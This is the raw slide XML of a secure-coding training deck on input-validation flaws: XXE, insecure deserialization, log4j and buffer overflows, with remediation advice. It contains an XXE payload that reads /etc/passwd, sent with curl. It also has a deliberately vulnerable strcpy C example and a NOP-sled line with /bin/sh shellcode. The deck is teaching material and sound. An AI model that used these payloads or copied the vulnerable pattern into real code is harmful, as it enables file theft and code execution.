            <a:ext cx="480945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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> &lt;&lt;EOF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;?xml version="1.0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>="UTF-8"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> SYSTEM "file:///etc/passwd"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;data&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;/data&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>EOF  |  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -X POST http://server/parseXml -d @-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79CCD92-B59B-98E1-16F6-BBCABF34E823}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2724151" y="4862512"/>
            <a:ext cx="728662" cy="3524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84F39F-7285-CDC2-DD9E-24B5F59C8C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3691271" y="4752975"/>
            <a:ext cx="77362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server-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, the Xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>xee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>;" 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expanded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> a file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include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parsing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failed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, and the </a:t>
            </a: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sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> full output </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> a VERY FREQUENT bug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 Xml Soap &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Wsdl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in the 2000-2010, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>raise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> of "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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317877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D36829-C734-7407-2178-F7D59BDADB05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XML </a:t>
            </a:r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(XXE) [3/3] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remediation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BEB0D-97E5-8F25-DDCE-01CCA4CAC3C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2462212" y="1676401"/>
            <a:ext cx="817076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 do not use XML  ...  use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>modernize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stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>2/  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>disable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> XML "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Too</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>-Smart" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Parsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>features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3/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>responding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too-rich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>4/,5/,6/ ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> as SQL Injection:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> Inputs, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>        Check Code &amp; Configuration settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>        use Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> Tools (Sonar, ..)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>containerized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> app, etc.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46577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432C1-6589-1511-92E6-B32C57026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A9E1-5E3A-A8F3-ABA3-2DCC111D7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6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Common "Input Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/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D4C04-1E9A-9A39-362A-F8B7D9965DD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243389" y="1714501"/>
            <a:ext cx="4513864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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Traversal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Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> (XXE) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Deserialization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etc...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6AC15C-92B3-4852-9B58-F95B1932FE4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686175" y="1619249"/>
            <a:ext cx="5581650" cy="36147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78247E-CB8A-C3A7-F65B-27DC4059AFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4090987" y="5800727"/>
            <a:ext cx="5481638" cy="92868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43D299A-0949-7ADF-0EA9-702537A7AD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3128962" y="5436098"/>
            <a:ext cx="657225" cy="4333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6337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D4162-0C65-9C3F-D1CF-1BF585831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539"/>
            <a:ext cx="10515600" cy="1581150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Deserialization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Unmarshaling Input - Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Execution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C0CF9-FA71-3B56-62EF-821BC2C7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5" y="1572744"/>
            <a:ext cx="6148620" cy="523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2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4E95-15FB-C51C-E005-D7BC562F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log4j  CVE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52F7FC-8C49-407F-AA10-CBD864372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69" y="1891499"/>
            <a:ext cx="11678662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10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EA80-C4D0-1DEE-839F-10B3081A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36048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(Stack) Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ?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14777AF6-58F7-FF28-285A-FDD3CF74B86B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3023270">
            <a:off x="4410075" y="2698148"/>
            <a:ext cx="400050" cy="8524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5728E44-BCBE-768C-BDDE-33254E5079EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819775" y="2821973"/>
            <a:ext cx="400050" cy="8524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E18A466-3EBC-DF51-3B31-7A884319E711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18757778">
            <a:off x="7083133" y="2700946"/>
            <a:ext cx="400050" cy="8524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A76696-C485-270F-3387-46567FAB56BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2628901" y="3562734"/>
            <a:ext cx="214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Blue Screen of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Death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F9FC67-E7C7-FC67-80D4-3DD37DC4E11C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5021186" y="3872297"/>
            <a:ext cx="200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Segmentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fault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DBB07A-40C1-D3C4-A81B-6BBE4023AE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7732234" y="3478818"/>
            <a:ext cx="2128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Possible Attack </a:t>
            </a:r>
          </a:p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Crafted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35842" name="Picture 2" descr="Blue screen of death - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EE7D2D-9368-2ACA-38AF-C4AE15073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79" y="4056963"/>
            <a:ext cx="3090709" cy="193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What is a Segmentation Fault? - Tech-FAQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90AFBC5-42E7-240A-7785-4539106FB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272" y="4563671"/>
            <a:ext cx="3128962" cy="20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 descr="Basics of Buffer Overflow Attacks">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3541B970-2CBB-701C-340E-19C7602C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2" y="4241629"/>
            <a:ext cx="312420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509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9F96F-8B3E-D821-E09B-1EEBCDAF9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118" y="1466653"/>
            <a:ext cx="8535140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34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0D57-8999-87F5-40C4-1FB24819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500"/>
            <a:ext cx="10515600" cy="1909763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Notice:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Security of System </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&lt;--&gt;  Security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3640E-D4A5-EA27-21AC-3E215501D727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2295526" y="3371850"/>
            <a:ext cx="82491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if System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unsecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> =&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> Data on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unsecure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specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>concerns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> on "Security of Data"  ...  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> course Part 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3253473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BF09-FD9F-4107-1662-DDC797E0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Anecdot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> on WII  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Nitendo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Game Station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028D8-215B-A350-BDCC-DA90E847F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01" y="1599992"/>
            <a:ext cx="7247248" cy="4801016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39938" name="Picture 2" descr="Nintendo Wii - Blanc">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3596DDAD-6C4C-BD6B-AFA5-C6004C988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600325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183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DDAFC-DF9C-1B97-58AD-1C509A0FC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19200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r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Vulnerability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E5711-C3EA-D289-5F90-F9D47FA9F956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538537" y="1724025"/>
            <a:ext cx="571746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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>vulnerableFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> char *input) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>buffer[8]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>(buffer, input);</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>[]) {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vulnerableFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR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8908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193E-EA8A-678C-AD2C-04BAA01A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Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Attack &amp; Risk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64A67-D09B-AF9A-0F5E-5D38AEB04D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661987" y="2638425"/>
            <a:ext cx="11064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./main  AAAAAAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>     \x90\x90\x90\x90 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>     \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>\x80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F3769EE-88CA-BD39-5FD8-B055C3BF31F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2571373">
            <a:off x="2976562" y="2271714"/>
